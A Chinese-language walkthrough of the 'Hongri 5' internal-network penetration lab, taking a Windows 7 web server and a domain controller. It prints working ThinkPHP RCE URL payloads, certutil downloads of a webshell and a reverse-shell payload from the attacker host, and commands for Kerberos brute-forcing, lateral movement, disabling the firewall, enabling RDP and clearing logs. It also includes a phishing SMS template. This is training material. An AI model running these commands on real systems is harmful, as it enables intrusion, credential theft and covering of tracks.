红日5

简介

"红日5"是一个高度仿真的内网渗透实战靶场，模拟了企业级内外网混合环境。靶场包含外网Web服务器（Windows 7）、内网域控服务器（Windows Server 2008）双重网络隔离场景，涵盖ThinkPHP RCE漏洞利用、权限提升、代理穿透、横向移动、域渗透等核心攻击链。通过该靶场，学习者可掌握主机发现、漏洞利用、隧道搭建、凭证窃取、Pass-the-Hash等APT攻击手法，并深入理解企业内网安全防护的薄弱环节。

最近红日官网已恢复正常访问，如果懒得一个一个转存可以直接拿我的，一共500G左右，下载还请预留好一定的空间通过网盘分享的文件：红日靶场

链接: https://pan.baidu.com/s/1ppyPlm6osobxReI50fCSZw 提取码: uze8

环境配置

设置好仅主机的vm2，138网段，然后我的nat模式网卡是135网段模拟公网

这个靶机呢一共有两个，

外网主机win7，设置好仅主机模式和nat模式两个网卡

内网域控服务器

win7

sunheart 密码：123.com

sunAdministrator 密码：dc123.com

2008（登录成功后要修改密码）

sunadmin 密码：2020.com

最重要的，需要在win7主机phpstudy开启web服务

网络拓扑结构

外网信息打点

利用arp-scan进行主机探测

arp-scan -l

利用nmap对目标主机进行端口扫描

nmap -sS 192.168.135.150 -p- -A

目标机器开启了80、135和3306数据库远程，mysql远程测试，拒绝连接

┌──(root㉿kali)-[~]
└─# mysql -uroot -h192.168.135.150 -p
Enter password:
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.135.128' is not allowed to connect to this MySQL server

查看web站点，可以看到这是一个thinkphp框架

随便访问一个不存在的页面，发现指纹信息，5.0.22版本

寻找exp

searchsploit 5.0 thinkphp

已知我们的版本为5.0.22

searchsploit -m 46150
cat 46150.txt | grep 5.0.22

拼凑EXP，执行命令whoami，成功利用

http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

查看当前目录

http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=chdir

使用generate生成混淆的webshell，不容易被查杀

weevely generate cmd shell.php

从kali下载webshell

http://192.168.135.150/
?s=index/thinkapp/invokefunction
&function=call_user_func_array
&vars[0]=system
&vars[1][]=certutil -urlcache -split -f http://192.168.135.128:5000/shell.php

kali连接webshell

查看内网IP，发现内网网段

ipconfig

利用arp进行主机探测，发现域控主机192.168.138.138

arp -a

开始代理reGeorg，详细使用方法三种代理方法打入内网

certutil -urlcache -split -f http://192.168.135.128:5000/tunnel.php

访问网页，发现直接报错，可能不适用windows了

那么切换frp，查看一下配置文件，注意这里是windows的frp，我用的版本是0.39.1，去github翻一翻历史版本的，新版本可能会出问题

上传到靶机上面去，有两个文件，一个程序一个配置文件

然后修改服务端的代理配置

vi /etc/proxychains4.conf

使用proxychains打开MSF，利用永恒之蓝漏洞，打域控靶机，这里失败了

proxychains msfconsole
search ms17_010_eternalblue
use 0
set rhosts 192.168.138.138
run

这个时候我们就可以使用端口扫描进行信息收集（连接某些未开放端口的时候可能会显示超时，这是正常现象，继续等待即可）

use scanner/portscan/tcp
set RHOSTS 192.168.138.138
run

不使用msf也可以使用nmap

proxychains nmap -Pn -sT 192.168.138.138

查看域信息sun.com

whoami并不是超级管理员也不是系统用户，这下我们就需要提权了，只有上升到系统权限才能使用mimikatz抓取hash

注意使用x64模块，不用msf的话也可以上传nc反弹shell

# kali
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=2222 LHOST=192.168.135.128 -f exe -o shellx64.exe

# 靶机
certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe

进入msf

use multi/handler
set LHOST 192.168.135.128
set lport 2222
set payload windows/x64/meterpreter/reverse_tcp
run

尝试使用msf的getsystem进行提权

创建一个监听器，用于上线靶机（同理可以用nc来上线）

我们生成一个可以上线CS的exe程序

生成到d盘中，并传到kali中

scp .beacon.exe kali@192.168.135.128:/data/windows_atk

并使用msf的upload上传此文件

upload /data/windows_atk/beacon.exe C:\phpStudy\PHPTutorial\WWW\public\beacon.exe

执行木马

上线cs

设置延迟执行命令 sleep 0 之后，就可以开始提权了

尝试了各种操作后，都普通用户提权失败

那么能怎么办呢——域内爆破，网上很多教程都是直接登录的administrator用户，直接用CS提权成功（上线的时候就是administartor），并没有完整的复现出来从一个最普通的用户上升到系统权限的教程，就很水

信息收集，域内用户，由于当前用户是普通用户，普通用户无法直接获取域内的用户列表

shell net view

换思路，域内不行，那就本机用户，可以看到有一个administrator用户

shell net user

那么这个用户也可能是域内的管理员用户吧？我们可以利用msf的kerberos_enumusers爆破 Kerberos 服务（88 端口，前面端口扫描的时候扫出来）

proxychains msfconsole
use gather/kerberos_enumusers
set DOMAIN sun.com
set RHOSTS 192.168.138.138
set USERNAME Administrator
set PASS_FILE /data/SecLists_Dict/Passwords/darkweb2017-top1000.txt
set THREADS 4
run

成功爆破出来用户密码为dc123.com

注意：如果不用CS那么可以利用 hydra 进行爆破

proxychains hydra -l Administrator -P pass.txt 
  -s 445 -t 4 -vV -m "SMB" 
  smb://192.168.138.138

我们尝试使用其他用户上线呢

我们尝试使用其他用户身份上线

以本地用户登录失败，那么就切换到域控服务器

需要让我们输入密码，但是msf上线的不是交互式shell

连接并查看域控，也失败

使用PsExec模块攻击域控，失败！

proxychains msfconsole
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.138.138      # 域控IP
msf6 > set SMBUser Administrator
msf6 > set SMBPass dc123.com
msf6 > set SMBDomain sun.com
msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp  # 内网直连
msf6 > run

试了很多方法都不行，最终以失败告终，无法登录到域控服务器/切换本地用户，或者本地提升到Administrator用户。那么就剩下最后的办法了，社工！(诈骗案例分析，请勿用于违法用途，所造成的后果自行承担)

最近张伟管理员发了一条微博：”周末加班部署新防火墙，累成狗🐶”，

并且利用一定手段获取到了手机号。

【xxx科技IT部】紧急：OA系统漏洞需立即处理，请查收邮件并登录修复平台。确认后请回复“已处理”。

到了周末，管理员成功登录了系统，启动了phpstudy这个web服务，此时即可上线

kali连接我们的后门

weevely terminal http://192.168.135.150/shell.php cmd

运行我们的木马即可上线成功

设置svc-exe提权方式

已成功上线系统权限

抓取本地密码hash

此时就能看到密码信息了

查看域内用户

shell net user /domain

使用代理转发功能

创建一个监听器

生成需要上传到域控主机上的木马

从本机上传上去

certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe

放行4444端口

shell netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4444

开始将马上传到目标服务器

shell net use \192.168.138.138ipc$ "管理员密码" /user:administrator
shell net use
shell dir \192.168.138.138c$ # 查看域控主机目录
# 将马上传到域控服务器
shell copy C:phpStudyPHPTutorialWWWpublicwin7beacon.exe \192.168.138.138c$win7beacon.exe

创建执行任务，提示了我们拒绝访问

sc \192.168.138.138 create shell binpath= "c:win7beacon.exe"

那么就用另外一种方式 at ，添加一个计划任务

shell at \192.168.138.138 22:10:00 c:win7beacon.exe

耐心等待一分钟既可上线，而且还是最高权限，拿下域控主机

关闭防火墙

shell netsh advfirewall set allprofiles state off

修改注册表允许远程连接

shell reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

放行3389端口

shell netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP

查看用户密码

修改代理文件，并重启frp服务

本机windows打开代理工具

可以看到我们已经能够正常访问域控主机了

刚进去是登录错误的，我们重新输入账号密码，登录到域sum.com

成功拿下域控服务器！

最后清理日志即可

至此红日5完成

总结

攻击路径全景

外网突破
- 通过 arp-scan + nmap 探测开放80/3306端口
- 利用ThinkPHP 5.0.22 RCE漏洞（ /index/thinkapp/invokefunction ）
- 上传混淆Webshell（Weevely）实现持久化控制
内网渗透
- 发现双网卡结构（NAT+Host-Only）及内网段192.168.138.0/24
- 使用 frp 搭建Socks5代理穿透内网边界
- 通过 proxychains + nmap 扫描域控（192.168.138.138）暴露445端口
权限提升
- MSF生成载荷上线失败后，通过CS的 svc-exe 提权获取SYSTEM权限
- 利用 mimikatz 抓取本地管理员凭证（Administrator:dc123.com）
横向移动
- IPC$共享+计划任务（net use + at）投递Beacon载荷
- 绕过防火墙放行端口（netsh advfirewall）
- 通过RDP（注册表修改fDenyTSConnections）接管域控桌面
权限维持
- 域控主机部署多协议后门（MSF+CS双链路）
- 清理日志（clearev）隐藏攻击痕迹